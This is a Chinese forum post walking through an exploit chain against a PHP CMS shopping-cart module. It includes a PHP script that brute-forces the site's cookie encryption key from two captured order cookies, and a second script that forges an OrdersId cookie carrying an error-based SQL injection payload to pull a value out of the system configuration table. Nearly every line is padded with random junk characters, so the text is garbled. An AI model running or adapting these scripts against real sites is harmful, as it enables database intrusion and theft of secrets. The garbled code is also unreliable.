www.xxx.com/plus/search.php?keyword=
7 y: y2 J& S- o- B/ r在 include/shopcar.class.php中/ b2 M6 U+ F% |6 @: H1 d
先看一下这个shopcar类是如何生成cookie的
: f/ C6 a( x8 ]8 W# m; l: `2 P239 function saveCookie($key,$value)
' F& e7 G/ k" z, l2 @* l% G8 C240 {( E- P4 K8 I0 s- v5 U4 v
241 if(is_array($value))
1 x) D9 l2 R( f8 V! M; P% v9 W242 {
: ^6 g9 g- I2 l$ O9 x, w9 }243 $value = $this->enCrypt($this->enCode($value));
& C2 g& E& Y* i2 w# B. X l# l244 }$ x5 P! c5 h1 \" O$ b: F; c
245 else
. c8 }7 [0 N6 F* T- X( H4 l* T; e. _" k246 {
* H' l2 p# _/ P- [* ?% A7 ]6 ^247 $value = $this->enCrypt($value);! m9 T* @7 b* Z" D5 N9 t
248 }5 u1 z4 p) q* W4 ?1 q' T
249 setcookie($key,$value,time()+36000,’/');0 v+ ]* e8 G( ^" s. ]2 Q+ b7 u* V
250 }$ M/ \+ H- Z- C$ R' O5 H2 o: i. C
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数7 W' z. B. |# ]
186 function enCrypt($txt)
* M. H# J. ~3 r# W( d187 {
+ |) B' J4 T P188 srand((double)microtime() * 1000000);5 \' Q( |# \1 V
189 $encrypt_key = md5(rand(0, 32000));/ z$ U" M$ V) p3 p, B1 J r" a
190 $ctr = 0;
0 `" q* m, V6 {7 ^7 r6 V2 M191 $tmp = ”;" o7 y0 C, f" @# T
192 for($i = 0; $i < strlen($txt); $i++)
6 e% C. W6 J0 ^2 a6 e2 F) F& v8 L193 {
9 s8 {5 w) v6 j+ o& R6 g194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
' ~/ Z2 w) B: T+ @195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
+ Z: Y" P0 K5 c4 K9 {: ~196 }
6 S l8 Q' z# X7 @, x8 t8 [197 return base64_encode($this->setKey($tmp));
! `* a5 U# q7 n4 P4 ?198 }
- g) v% |) l: L) `# R8 H4 o1 [213 function setKey($txt)
) x9 E8 [% f4 Q. K1 r" Y& L214 {" M$ u* @9 O: a7 p- A, X2 O. `
215 global $cfg_cookie_encode;# ^( [. ?2 \, `6 `5 W4 v
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
. l h6 }1 E9 C+ G217 $ctr = 0;
/ c# p& W& ]2 q- ^( I218 $tmp = ”;
. ?4 l% v1 L/ p9 J219 for($i = 0; $i < strlen($txt); $i++) h) R8 M$ U3 o, W
220 {
9 |/ X, h7 b4 l: L6 i* `221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;1 [: d% p# c- _, v
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
' u8 \1 t9 k' m: o6 {* r/ v223 }7 Z; Q1 ]: h8 s2 m
224 return $tmp;
( |3 N B, x% |8 C225 }- ^7 j; ]3 ^: f* s( p+ w$ N
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的; |7 t/ n+ ?& Q' ~! ]- Q$ B' \
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。- l3 h+ v- V/ ~0 A' X% o8 @
具体代码如下:: H z9 F& C$ \ q% m
<?php4 N- Y& H( w, h7 G2 R% ^: V
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here- w1 C9 f2 Q/ R$ N
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here0 x$ a3 q: L% N2 f4 u
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here( @. _4 o. \. g/ x1 L+ j
function reStrCode($code,$string)
+ E, p; \: ^7 S3 K{: N2 |2 A' [9 T2 q% b" o4 }5 h
$code = base64_decode($code);
5 _ [2 \ p) n6 [9 _' w4 i$key = “”;
8 o5 x+ i+ ]" W2 l5 W! V0 z% Ofor($i=0 ; $i<32 ; $i++)
' P$ d8 e8 e/ W1 l, k0 U# n; @{7 a# m1 d, \: o% c, ]% D: d
$key .= $string[$i] ^ $code[$i];- t0 D% k! ?: A2 e
}
$ {; h# E. M2 \0 Creturn $key;5 g0 g+ U. O8 T& C- ^9 y( n$ S
}6 c# D N* H5 M9 a
function getKeys($cookie,$plantxt)9 f) @2 r6 V' F6 a1 F! _
{( L0 s/ o! M3 L9 z) N7 x
$tmp = $cookie;
8 n# E8 e1 u/ O# u$results = array();
! ~& ]+ l! V# E' Y" z8 H4 W9 @% Wfor($j=0 ; $j < 32000; $j++)
: U: |2 C0 T) y{
9 w: Q( R6 f* y8 A4 b" X& o+ q
" {0 N8 G* ]/ v$ Q/ z$txt = $plantxt;( q5 n+ C+ v: P! D. Y: M- K
$ctr = 0;
9 B8 C' `/ t: q$tmp = ”;
' k* ?( `7 [: l$encrypt_key = md5($j);
1 Q) X, @0 u" zfor($i =0; $i < strlen($txt); $i ++)
$ t0 L, u% Y. I# G{
$ s7 ]) i8 S" U/ j' m: [$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;" v4 |8 P; {; a3 s2 L4 R
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
. C* g' ]! E2 c6 R; R9 i4 s. Z}
7 {# @/ l0 m; C/ y8 ~$string = $tmp;
4 V$ T3 G. d. U- F6 V$code = $cookie;# I q7 y0 ^, e1 S* U
$result = reStrCode($code,$string);$ t, p! c A/ v# T7 c q5 S W
if(eregi(‘^[a-z0-9]+$’,$result))
. O7 \: i5 x6 G/ ?# p! w1 ]/ u8 A( c{
" \- F4 c) {! V1 }! h: |echo $result.”\n”;! v. d( Q, y# p; y1 R
$results[] = $result;2 O1 t2 X2 ], H* e
}
) R! i$ O. Y. z. R6 P' L}
. H! a( L% O5 f Hreturn $results;7 [" N$ u; a7 Q5 h$ \
}
7 i: C3 I& q- o3 r6 Q0 z% ~$results1 = getKeys($cookie1,$plantxt);
9 p/ B( f' i9 B2 E' Z$results2 = getKeys($cookie2,$plantxt);
& H. U% t0 N; e' ?& Uprint “\n——————–real key————————–\n”;
5 n+ a2 r5 f6 K6 aforeach($results1 as $test1)
* m! x+ E1 V2 q' a! I) p: o{
; e7 {/ X7 r/ M$ E3 N/ H: Q: Hforeach($results2 as $test2)0 E0 N C+ h/ f/ |
{+ R: z& {; W$ @* L2 P( f
if($test1 == $test2)7 \! ?) }6 Z S0 i4 S, ~- a4 p
{
6 J5 p3 T* V: F! F0 T6 ~echo $test1.”\n”;
- p- X3 ]3 A; l$ F3 j5 c5 v' p& _, @}8 a$ z) z1 J ~! R
}
( Y! ^* |% ]+ B" [4 y0 z}; W ^( Z' ?; v
?>
, z6 l/ T0 a' @1 v# w; G# Xcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,3 i9 ]8 e7 m' j5 N
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
9 p2 J1 G% y+ H然后推算出md5(strtolower($cfg_cookie_encode))" }5 B/ s7 c, ?5 x$ `
得到这个key之后,我们就可以构造任意购物车的cookie. W& a8 q: v4 R; `# C5 L% R* @5 L
接着看) u( f6 \* C3 S* e9 S
20 class MemberShops0 V9 } H1 w& w+ T& i
21 {2 Y4 t8 I' F! t5 Y, C) j4 T
22 var $OrdersId;: m& A2 B8 E- U6 y) g. ~4 P
23 var $productsId;: M+ N' c2 Z' j u0 c
24
+ Z, ~' m _8 \3 A: K; l' j25 function __construct()" R0 J. l X, }! h9 Y8 J4 h9 Q
26 {
: j! M% q$ X0 Z' u8 b. U3 r) ^27 $this->OrdersId = $this->getCookie(“OrdersId”);
0 G9 a/ M" n: K( ]28 if(empty($this->OrdersId))
- ~8 l6 y8 m6 |. `! x! L' f% }29 {8 S7 w# d) a% l# X) a
30 $this->OrdersId = $this->MakeOrders();
$ R. N$ t: G1 ` r31 }) {$ y2 g- _3 q% s$ R' `# ~7 L6 Y) h' V, Z
32 }
1 i$ v5 [1 Z f L3 m发现OrderId是从cookie里面获取的
! H ?- v! e4 A" ^* @" e7 `- r# |然后9 ^9 Y+ P. Q1 t6 {4 f- @
/plus/carbuyaction.php中的, {* i0 g( q3 k( k+ y4 I
29 $cart = new MemberShops();' `; F) W' X4 q o
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
; N8 M% `8 w0 f* [+ x$ q% n" a! [……
0 i q. v1 V7 _- e4 |173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
! d, f8 o# [- s6 x9 Q( d接着我们就可以注入了
) N/ v( O2 G" ?: V: ~通过利用下面代码生成cookie:! D4 _3 H; h) K* M% ~
<?php
1 M. l2 M8 k) N$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;. R: L. J& z4 k- O( u# }1 T
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here3 ] {& K- u, K, k( n! S/ j
function setKey($txt)
9 L* z- L3 B2 A( ^8 J N{
% J0 N0 ^2 D5 K$ R8 Gglobal $encrypt_key;
* Q0 c8 c9 D$ b4 W+ H$ctr = 0;
7 ^$ c4 D# L& m6 I2 L- x* L$tmp = ”;. s8 r4 j( I t; |2 G& ~
for($i = 0; $i < strlen($txt); $i++)
$ ~* \% p' N6 v: x# B$ l{: n+ ? p) y; }5 N& C: G
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;8 S. ~5 m4 F! }, S [, P( ]' E, M
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];& `9 }; Q6 k8 _, D& |# Y1 D
}7 C8 `1 g- v! w- t0 g1 b
return $tmp;2 G# A( W) g/ ~5 u, g& L6 |
}9 z, g3 d5 x+ G) j# ?# f, Q
function enCrypt($txt)
1 i+ u+ y7 M- u9 k' E5 L{5 _# _: a7 T3 j" }) S9 ]% R N0 [
srand((double)microtime() * 1000000);
* d+ x8 p$ w" j0 ^$encrypt_key = md5(rand(0, 32000));
0 Z7 [) {1 l- K! |" Q) D$ctr = 0;$ G, z" t; j( L6 R
$tmp = ”;
/ h' s! [8 R! @9 u2 ?' lfor($i = 0; $i < strlen($txt); $i++)
6 p- [2 b9 \" B# s: q8 h B{4 m3 p! K+ y! w) F% n
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;; @) L9 d5 z+ n3 m
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);9 N% t0 ?5 O5 h) W# P
}8 @7 {) ?% o% g$ E& s4 w% s
return base64_encode(setKey($tmp));
* v6 D2 d7 v, r$ _}
n3 h( {) D. [for($dest =0;$dest = enCrypt($txt);)$ Z: y+ ~# i: b( `1 X. }
{
( _3 A) u4 c( {2 H! d8 |if(!strpos($dest,’+'))- f, `0 R1 v: P, J1 S
{
3 `) v2 i, f' }/ W4 I4 G# gbreak;3 X6 e- ^+ Q4 B3 K( r
}
4 t3 P5 W2 x- Z1 X2 J# a}9 M$ M+ S, l( j5 u! P
echo $dest.”\n”;& `3 w5 C, b0 K# N
?>" M, W: \" c% l
5 k+ o3 u; g" i/ n# @
|
发表于 2013-2-13 23:58:29
收藏
支持
反对